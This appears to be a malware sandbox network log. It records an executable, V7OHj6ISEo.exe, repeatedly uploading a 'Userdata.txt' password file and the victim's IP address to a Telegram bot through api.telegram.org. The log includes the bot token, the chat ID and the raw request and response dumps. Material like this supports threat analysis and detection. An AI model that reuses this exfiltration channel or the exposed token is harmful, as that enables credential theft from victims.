                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43555,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543667,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.749976149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:29 UTC299OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31c2157956b1
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 21:14:29 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 63 32 31 35 37 39 35 36 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31c2157956b1Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:29 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:29 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:29 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 36 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43556,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543669,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.749978149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:31 UTC275OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31d84ced9d6a
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 21:14:31 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 64 38 34 63 65 64 39 64 36 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31d84ced9d6aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:31 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:31 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:31 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43557,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543671,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.749980149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:33 UTC299OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31ee72096cab
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 21:14:33 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 65 65 37 32 30 39 36 63 61 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31ee72096cabContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:34 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:33 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:34 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 35 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43558,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543673,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.749982149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:35 UTC275OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3205e599678f
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 21:14:35 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 30 35 65 35 39 39 36 37 38 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3205e599678fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:35 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:35 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:35 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 35 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 37 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43559,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543675,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.749984149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:37 UTC275OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd321be47d524a
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 21:14:37 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 31 62 65 34 37 64 35 32 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd321be47d524aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:37 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:37 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:37 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 37 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43560,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543677,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.749986149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:39 UTC275OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32332e7fb6a5
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 21:14:39 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 33 33 32 65 37 66 62 36 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32332e7fb6a5Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:40 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:39 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:40 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 37 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43561,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543679,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.749988149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 21:14:41 UTC275OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd32464c377f16
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 21:14:41 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 36 34 63 33 37 37 66 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd32464c377f16Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 21:14:41 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 21:14:41 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 546
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 21:14:41 UTC546INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 33 36 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43562,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736543681,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.749990149.154.167.2204434136C:\Users\user\Desktop\V7OHj6ISEo.exe
                                                                                                          TimestampBytes transferredDirectionData
